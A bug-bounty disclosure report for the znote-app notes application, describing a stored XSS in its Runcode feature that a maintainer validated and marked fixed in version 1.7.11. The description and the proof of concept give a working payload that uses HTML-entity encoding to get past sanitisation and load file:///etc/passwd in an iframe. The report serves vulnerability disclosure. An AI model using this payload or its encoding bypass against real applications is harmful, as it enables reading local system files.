XSS to LFI in Runcode Feature in alagrede/znote-app

Valid

Reported on

Nov 28th 2022


Description

By default runcode santized document prefix but if html encode to &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041 then we can inserted html encoded func to html tag event like onerror <img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC: https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

Proof of Concept

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

Github issue: https://github.com/alagrede/znote-app/issues/73

Impact

Read Local OS File With Stored XSS

We are processing your report and will contact the alagrede/znote-app team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
reza.duty
a month ago

Researcher


any update?

Pavlos modified the Severity from High (8.6) to Low (2.3) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Pavlos validated this vulnerability a month ago
reza.duty has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 1.7.11 with commit d88933 a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pavlos published this vulnerability a month ago
reza.duty
a month ago

Researcher


can you please request for cve

to join this conversation